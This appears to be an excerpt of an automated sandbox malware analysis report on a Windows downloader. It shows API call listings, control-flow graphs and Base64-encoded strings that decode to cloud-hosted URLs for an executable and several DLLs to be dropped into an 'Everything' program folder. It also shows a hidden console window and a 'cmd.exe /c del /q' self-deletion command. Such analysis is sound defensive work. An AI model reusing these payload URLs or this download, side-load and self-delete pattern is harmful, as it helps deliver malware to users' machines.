                                                              • task.LIBCPMTD ref: 005E3087
                                                              • task.LIBCPMTD ref: 005E3096
                                                              • task.LIBCPMTD ref: 005E30E6
                                                              • task.LIBCPMTD ref: 005E30F8
                                                              • task.LIBCPMTD ref: 005E3148
                                                              • task.LIBCPMTD ref: 005E315A
                                                              • task.LIBCPMTD ref: 005E31AA
                                                              • task.LIBCPMTD ref: 005E31BC
                                                              • task.LIBCPMTD ref: 005E320C
                                                              • task.LIBCPMTD ref: 005E321E
                                                              Strings
                                                              • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL3ZjcnVudGltZTE0MC5kbGw=, xrefs: 005E30B2
                                                              • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTQwLmRsbA==, xrefs: 005E3114
                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==, xrefs: 005E30FD
                                                              • C:\Program Files (x86)\Everything, xrefs: 005E2FF0
                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==, xrefs: 005E315F
                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=, xrefs: 005E309B
                                                              • aHR0cHM6Ly9sZWlzdXJldHJhZGUtMTMyMzU3MTI2OS5jb3MuYXAtYmVpamluZy5teXFjbG91ZC5jb20vemZfY2VmLmRsbA==, xrefs: 005E31D8
                                                              • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNyMTIwLmRsbA==, xrefs: 005E305F
                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==, xrefs: 005E304B
                                                              • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTIwLmRsbA==, xrefs: 005E3176
                                                              • aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tLzEuZXhl, xrefs: 005E300F
                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHpmX2NlZi5kbGw=, xrefs: 005E31C1
                                                              • QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl, xrefs: 005E2FFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: task$Internet$CloseHandleOpen$CreateDirectoryFileRead
                                                              • String ID: C:\Program Files (x86)\Everything$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXEV2ZXJ5dGhpbmcuZXhl$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNwMTQwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXG1zdmNyMTIwLmRsbA==$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHZjcnVudGltZTE0MC5kbGw=$QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXEV2ZXJ5dGhpbmdcXHpmX2NlZi5kbGw=$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTIwLmRsbA==$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNwMTQwLmRsbA==$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL21zdmNyMTIwLmRsbA==$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tL3ZjcnVudGltZTE0MC5kbGw=$aHR0cHM6Ly9rZGxsLTEzMjM1NzEyNjkuY29zLmFwLWJlaWppbmcubXlxY2xvdWQuY29tLzEuZXhl$aHR0cHM6Ly9sZWlzdXJldHJhZGUtMTMyMzU3MTI2OS5jb3MuYXAtYmVpamluZy5teXFjbG91ZC5jb20vemZfY2VmLmRsbA==
                                                              • API String ID: 1727112427-2279345222
                                                              • Opcode ID: 45e9e4966a8631f48e1b5578ba36e8872980e05788f9fa7bd3420d0f6c8b7b7b
                                                              • Instruction ID: b91b07b060b21552b8c02390688a65565d4952658e799131f092f99beff31b79
                                                              • Opcode Fuzzy Hash: 45e9e4966a8631f48e1b5578ba36e8872980e05788f9fa7bd3420d0f6c8b7b7b
                                                              • Instruction Fuzzy Hash: C9518175C41289EACB18EBA0DE4ABDDBB34BF51304F9085D8E1556B1C2EB701B48CB91

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000100), ref: 005E2F4E
                                                              • SetPriorityClass.KERNEL32(00000000), ref: 005E2F55
                                                              • GetCurrentThread.KERNEL32 ref: 005E2F5D
                                                              • SetThreadPriority.KERNEL32(00000000), ref: 005E2F64
                                                              • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 005E2F78
                                                              • _fwprintf.LIBCONCRTD ref: 005E2F92
                                                                • Part of subcall function 005E1170: _fread.LIBCMTD ref: 005E118A
                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 005E2FB1
                                                              • ExitProcess.KERNEL32 ref: 005E2FB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
                                                              • String ID: /c del /q %s$cmd.exe$open
                                                              • API String ID: 809167050-3932901086
                                                              • Opcode ID: eaa21a17b2d13cd67472ca8b626239ff273777123e139c63bbe5c7c64857c4bb
                                                              • Instruction ID: f0bd0e067f7c9a2a9ce4b3f5b76b4975c3f72bdc18d7fef03c8fb4680b8ef12c
                                                              • Opcode Fuzzy Hash: eaa21a17b2d13cd67472ca8b626239ff273777123e139c63bbe5c7c64857c4bb
                                                              • Instruction Fuzzy Hash: 7FF0FF71A84305BBE715BBE0AC4FFEA3A2BBB49B01F041458B7069A0D2DAF05584CB75

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 157 605749-605779 call 605497 160 605794-6057a0 call 5fffc3 157->160 161 60577b-605786 call 5f1ff6 157->161 166 6057a2-6057b7 call 5f1ff6 call 5f2009 160->166 167 6057b9-605802 call 605402 160->167 168 605788-60578f call 5f2009 161->168 166->168 176 605804-60580d 167->176 177 60586f-605878 GetFileType 167->177 178 605a6e-605a72 168->178 182 605844-60586a GetLastError call 5f1fae 176->182 183 60580f-605813 176->183 179 6058c1-6058c4 177->179 180 60587a-6058ab GetLastError call 5f1fae CloseHandle 177->180 185 6058c6-6058cb 179->185 186 6058cd-6058d3 179->186 180->168 194 6058b1-6058bc call 5f2009 180->194 182->168 183->182 187 605815-605842 call 605402 183->187 190 6058d7-605925 call 5fff0e 185->190 186->190 191 6058d5 186->191 187->177 187->182 200 605944-60596c call 6051ac 190->200 201 605927-605933 call 605611 190->201 191->190 194->168 207 605971-6059b2 200->207 208 60596e-60596f 200->208 201->200 206 605935 201->206 209 605937-60593f call 5f769f 206->209 210 6059d3-6059e1 207->210 211 6059b4-6059b8 207->211 208->209 209->178 214 6059e7-6059eb 210->214 215 605a6c 210->215 211->210 213 6059ba-6059ce 211->213 213->210 214->215 217 6059ed-605a20 CloseHandle call 605402 214->217 215->178 220 605a22-605a4e GetLastError call 5f1fae call 6000d6 217->220 221 605a54-605a68 217->221 220->221 221->215
                                                              APIs
                                                                • Part of subcall function 00605402: CreateFileW.KERNEL32(?,00000000,?,006057F2,?,?,00000000,?,006057F2,?,0000000C), ref: 0060541F
                                                              • GetLastError.KERNEL32 ref: 0060585D
                                                              • __dosmaperr.LIBCMT ref: 00605864
                                                              • GetFileType.KERNEL32(00000000), ref: 00605870
                                                              • GetLastError.KERNEL32 ref: 0060587A
                                                              • __dosmaperr.LIBCMT ref: 00605883
                                                              • CloseHandle.KERNEL32(00000000), ref: 006058A3
                                                              • CloseHandle.KERNEL32(005FBAD5), ref: 006059F0
                                                              • GetLastError.KERNEL32 ref: 00605A22
                                                              • __dosmaperr.LIBCMT ref: 00605A29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: bf26d239b0922bd430d61737ac80516e1976829363f31ae899ce0b6a451e28a9
                                                              • Instruction ID: f9dd4a34a88ecf231bd99acb734a332d1c0030f128f7d7185b2e039dcc5c8d98
                                                              • Opcode Fuzzy Hash: bf26d239b0922bd430d61737ac80516e1976829363f31ae899ce0b6a451e28a9
                                                              • Instruction Fuzzy Hash: D1A12432A545599FCF1D9F68DC95BEF3BA2AB46320F18015EF8029B3D1DB358812CB61

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 005E2CDB
                                                                • Part of subcall function 005E2B40: task.LIBCPMTD ref: 005E2C92
                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 005E2D19
                                                              • task.LIBCPMTD ref: 005E2D25
                                                              • task.LIBCPMTD ref: 005E2D70
                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 005E2DAC
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E2DE6
                                                              • InternetCloseHandle.WININET(00000000), ref: 005E2E02
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Internet$task$CloseHandleOpen$FileRead
                                                              • String ID: Mozilla/5.0
                                                              • API String ID: 3809162015-2630049532
                                                              • Opcode ID: 2bd23526780c99bca46a6cb749cbe79114de8cee59cb0a16eddd28031e2fbf93
                                                              • Instruction ID: e528b8be8583ebc9afd6e051ede0b092fa85ff37dc926bf0aea038a6dbcae4c4
                                                              • Opcode Fuzzy Hash: 2bd23526780c99bca46a6cb749cbe79114de8cee59cb0a16eddd28031e2fbf93
                                                              • Instruction Fuzzy Hash: 3D41AFB1A4024AABDB18DF90CD8ABEFBB79BB44300F104258F241772D0DBB45A44CFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 255 5e4520-5e4548 call 5e6bb0 call 5e6c10 260 5e454a-5e4556 call 5e6bc0 255->260 261 5e455b-5e4565 call 5e6210 255->261 266 5e46d8-5e46dd 260->266 267 5e459d-5e45a4 261->267 268 5e4567-5e457b call 5e6210 call 5e6190 261->268 269 5e45a6-5e45ab call 5e6bb0 267->269 270 5e45b0-5e45bf call 5e5bf0 267->270 268->267 283 5e457d-5e4598 call 5e46e0 call 5e6040 268->283 269->266 278 5e45ff-5e4646 call 5e46e0 call 5e58e0 270->278 279 5e45c1-5e45d8 call 5e46e0 call 5e2ac0 270->279 296 5e4648-5e464c 278->296 297 5e4656-5e4661 278->297 292 5e45dd-5e45e5 279->292 283->266 293 5e45ef-5e45f4 call 5e6bb0 292->293 294 5e45e7-5e45ed 292->294 298 5e45f7-5e45fa 293->298 294->298 296->297 300 5e464e-5e4652 296->300 301 5e4688-5e4695 297->301 302 5e4663-5e467f call 5eeb89 297->302 298->266 306 5e4654-5e46d3 call 5e6bb0 300->306 307 5e46a3-5e46bc call 5e2ac0 300->307 304 5e469c-5e46a1 call 5e6bb0 301->304 305 5e4697-5e469a 301->305 302->301 313 5e4681-5e4686 call 5e6bb0 302->313 304->266 305->266 306->266 318 5e46be-5e46c4 307->318 319 5e46c6-5e46cb call 5e6bb0 307->319 313->266 321 5e46ce-5e46d1 318->321 319->321 321->266
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traits
                                                              • String ID:
                                                              • API String ID: 1158913984-3916222277
                                                              • Opcode ID: e0141cd5b8471f13d3669d370f0f29927affb7cc6185455ab20bd4ddeca3f86a
                                                              • Instruction ID: a2b873a63f8797cabe4200fcd8be37758c6d2264db9dab8152a1aa2816a5fe9a
                                                              • Opcode Fuzzy Hash: e0141cd5b8471f13d3669d370f0f29927affb7cc6185455ab20bd4ddeca3f86a
                                                              • Instruction Fuzzy Hash: 7251A0B5D00199AFCF1CEB96C4459FE7FB9BF95340F048499E581AB241EB309A44CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 324 5fabe3-5fabf3 325 5fac0d-5fac0f 324->325 326 5fabf5-5fac08 call 5f1ff6 call 5f2009 324->326 327 5faf4f-5faf5c call 5f1ff6 call 5f2009 325->327 328 5fac15-5fac1b 325->328 340 5faf67 326->340 345 5faf62 call 5f143d 327->345 328->327 330 5fac21-5fac4a 328->330 330->327 334 5fac50-5fac59 330->334 338 5fac5b-5fac6e call 5f1ff6 call 5f2009 334->338 339 5fac73-5fac75 334->339 338->345 343 5faf4b-5faf4d 339->343 344 5fac7b-5fac7f 339->344 346 5faf6a-5faf6d 340->346 343->346 344->343 348 5fac85-5fac89 344->348 345->340 348->338 351 5fac8b-5faca2 348->351 353 5facd7-5facdd 351->353 354 5faca4-5faca7 351->354 355 5facdf-5face6 353->355 356 5facb1-5facc8 call 5f1ff6 call 5f2009 call 5f143d 353->356 357 5faccd-5facd5 354->357 358 5faca9-5facaf 354->358 361 5facea-5fad08 call 5f9045 call 5f7531 * 2 355->361 362 5face8 355->362 389 5fae82 356->389 360 5fad4a-5fad69 357->360 358->356 358->357 364 5fad6f-5fad7b 360->364 365 5fae25-5fae2e call 602aa1 360->365 393 5fad0a-5fad20 call 5f2009 call 5f1ff6 361->393 394 5fad25-5fad48 call 5fb174 361->394 362->361 364->365 369 5fad81-5fad83 364->369 376 5fae9f 365->376 377 5fae30-5fae42 365->377 369->365 373 5fad89-5fadaa 369->373 373->365 378 5fadac-5fadc2 373->378 381 5faea3-5faeb9 ReadFile 376->381 377->376 383 5fae44-5fae53 GetConsoleMode 377->383 378->365 384 5fadc4-5fadc6 378->384 387 5faebb-5faec1 381->387 388 5faf17-5faf22 GetLastError 381->388 383->376 390 5fae55-5fae59 383->390 384->365 385 5fadc8-5fadeb 384->385 385->365 392 5faded-5fae03 385->392 387->388 397 5faec3 387->397 395 5faf3b-5faf3e 388->395 396 5faf24-5faf36 call 5f2009 call 5f1ff6 388->396 391 5fae85-5fae8f call 5f7531 389->391 390->381 398 5fae5b-5fae73 ReadConsoleW 390->398 391->346 392->365 400 5fae05-5fae07 392->400 393->389 394->360 407 5fae7b-5fae81 call 5f1fae 395->407 408 5faf44-5faf46 395->408 396->389 404 5faec6-5faed8 397->404 405 5fae75 GetLastError 398->405 406 5fae94-5fae9d 398->406 400->365 410 5fae09-5fae20 400->410 404->391 414 5faeda-5faede 404->414 405->407 406->404 407->389 408->391 410->365 418 5faef7-5faf04 414->418 419 5faee0-5faef0 call 5fa8f5 414->419 424 5faf06 call 5faa4c 418->424 425 5faf10-5faf15 call 5fa73b 418->425 431 5faef3-5faef5 419->431 429 5faf0b-5faf0e 424->429 425->429 429->431 431->391
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18fe7aa66148513a4e948ec4a1d9ea089648c0061e32f9af672f7b01b8047a0d
                                                              • Instruction ID: 0d2391b079288554b7cdf35fe3d6beffd9689a5e036b197532f715c96c8c60c7
                                                              • Opcode Fuzzy Hash: 18fe7aa66148513a4e948ec4a1d9ea089648c0061e32f9af672f7b01b8047a0d
                                                              • Instruction Fuzzy Hash: BFB1D1F0A0424E9FDB119FA8D844BBE7FBABB49310F144159E7089B292D7789941CB63
                                                              APIs
                                                                • Part of subcall function 036C98D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 036C9964
                                                              • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 036C770F
                                                              • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 036C7742
                                                              • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 036C7775
                                                              • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 036C779F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProtectVirtual$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 895956442-0
                                                              • Opcode ID: 5abde9ea6318855c5243acd77b08285013fe7b3e318e0c860c6c3d549a2b56cb
                                                              • Instruction ID: 00e1e16817c6228c945ab7b9b52c1b59b6b657766bf3d54f460107250cd867a7
                                                              • Opcode Fuzzy Hash: 5abde9ea6318855c5243acd77b08285013fe7b3e318e0c860c6c3d549a2b56cb
                                                              • Instruction Fuzzy Hash: 1B21D6762143897FF310EA618C88FB7B6DCDB85314F08083EFA46D6151EB69E9058BB5

                                                              Control-flow Graph

                                                              APIs
                                                              • GetConsoleWindow.KERNEL32 ref: 005E35A4
                                                              • ShowWindow.USER32(?,00000000), ref: 005E35B3
                                                              • Sleep.KERNEL32(00000BB8), ref: 005E35C3
                                                                • Part of subcall function 005E3240: Sleep.KERNEL32(00000BB8,?,00608613,000000FF), ref: 005E326C
                                                                • Part of subcall function 005E3240: InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 005E328D
                                                                • Part of subcall function 005E3240: InternetOpenUrlA.WININET(00000000,\Ga,00000000,00000000,80000000,00000000), ref: 005E32CD
                                                                • Part of subcall function 005E3240: InternetCloseHandle.WININET(?), ref: 005E32FE
                                                                • Part of subcall function 005E3240: InternetCloseHandle.WININET(?), ref: 005E3361
                                                                • Part of subcall function 005E3240: InternetCloseHandle.WININET(?), ref: 005E336B
                                                                • Part of subcall function 005E3240: InternetReadFile.WININET(00000000,?,00001000,?), ref: 005E338C
                                                              • Sleep.KERNEL32(00000BB8), ref: 005E35D3
                                                                • Part of subcall function 005E2F40: GetCurrentProcess.KERNEL32(00000100), ref: 005E2F4E
                                                                • Part of subcall function 005E2F40: SetPriorityClass.KERNEL32(00000000), ref: 005E2F55
                                                                • Part of subcall function 005E2F40: GetCurrentThread.KERNEL32 ref: 005E2F5D
                                                                • Part of subcall function 005E2F40: SetThreadPriority.KERNEL32(00000000), ref: 005E2F64
                                                                • Part of subcall function 005E2F40: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 005E2F78
                                                                • Part of subcall function 005E2F40: _fwprintf.LIBCONCRTD ref: 005E2F92
                                                                • Part of subcall function 005E2F40: ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 005E2FB1
                                                                • Part of subcall function 005E2F40: ExitProcess.KERNEL32 ref: 005E2FB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseHandleSleep$CurrentOpenPriorityProcessThreadWindow$ChangeClassConsoleExecuteExitFileNotifyReadShellShow_fwprintf
                                                              • String ID:
                                                              • API String ID: 96696892-0
                                                              • Opcode ID: ebc7f4de00e22f2004a7b01109c2ffca56d50be6c63f9257aaeaeb752533b284
                                                              • Instruction ID: f2aea963b4801a0ebc18fe2b5e515e48c5e79b24510363ecb0247e16dc1efe87
                                                              • Opcode Fuzzy Hash: ebc7f4de00e22f2004a7b01109c2ffca56d50be6c63f9257aaeaeb752533b284
                                                              • Instruction Fuzzy Hash: B3E08630580209ABC304BBB6DD0F61E7AAEAB40705F000094F602961B2CEB15D008671
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 036C9964
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: .$.dll
                                                              • API String ID: 1029625771-979041800
                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                              • Instruction ID: e72d017d8f53049a83265c3560056f7a9f3da94694e0d1f251de944cb33276b9
                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                              • Instruction Fuzzy Hash: 442190356143C59FEB21CFA8C984A7ABBE8EF05724F1C41ADD9559BB41D720E845C780

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 439 5e7990-5e79e7 call 5e6c60 call 5e2810 444 5e79e9 439->444 445 5e7a37-5e7a3a 439->445 447 5e79eb-5e79ef 444->447 448 5e79f1-5e7a0d call 5e2810 444->448 446 5e7a3f-5e7a6b call 5e5750 call 5e56c0 445->446 459 5e7a6d-5e7a76 446->459 460 5e7a7b-5e7a9f call 5e27f0 446->460 447->445 447->448 448->445 453 5e7a0f 448->453 455 5e7a19-5e7a35 call 5e2810 453->455 456 5e7a11-5e7a17 453->456 455->446 456->445 456->455 462 5e7c5f-5e7c9d call 5e6400 call 5e56e0 459->462 466 5e7b36-5e7b3a 460->466 467 5e7aa5 460->467 470 5e7b3c-5e7b60 call 5e63e0 call 5e6270 466->470 471 5e7b84-5e7b88 466->471 469 5e7ab9-5e7abd 467->469 469->466 473 5e7abf 469->473 491 5e7b65-5e7b71 470->491 476 5e7b8e 471->476 477 5e7c1b-5e7c56 call 5e2830 471->477 478 5e7ac7-5e7b24 call 5e8760 call 5e63e0 call 5e85c0 call 5e6bb0 call 5e6c10 473->478 479 5e7ac1-5e7ac5 473->479 481 5e7ba2-5e7ba6 476->481 477->462 510 5e7b26-5e7b2f 478->510 511 5e7b31 478->511 479->466 479->478 481->477 486 5e7ba8 481->486 487 5e7baa-5e7bae 486->487 488 5e7bb0-5e7c09 call 5e8760 call 5e63e0 call 5e85c0 call 5e6bb0 call 5e6c10 486->488 487->477 487->488 515 5e7c0b-5e7c14 488->515 516 5e7c16 488->516 494 5e7b7b-5e7b81 491->494 495 5e7b73-5e7b79 491->495 494->471 495->471 495->494 510->466 511->469 515->477 516->481
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: char_traits
                                                              • String ID:
                                                              • API String ID: 1158913984-0
                                                              • Opcode ID: f79c588d6efda3a3ebcdbc96ac884d84fc1e81f3fde1009356bcb787f61f1219
                                                              • Instruction ID: a12a2ae40de49357e4247cbe8cd75d778e9a21d2dc926772c503f2f3c30688b5
                                                              • Opcode Fuzzy Hash: f79c588d6efda3a3ebcdbc96ac884d84fc1e81f3fde1009356bcb787f61f1219
                                                              • Instruction Fuzzy Hash: 44B1F874D04289DFCB18DF95C495AADBFB5FF88344F248129E589AB355DB30A941CF80

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
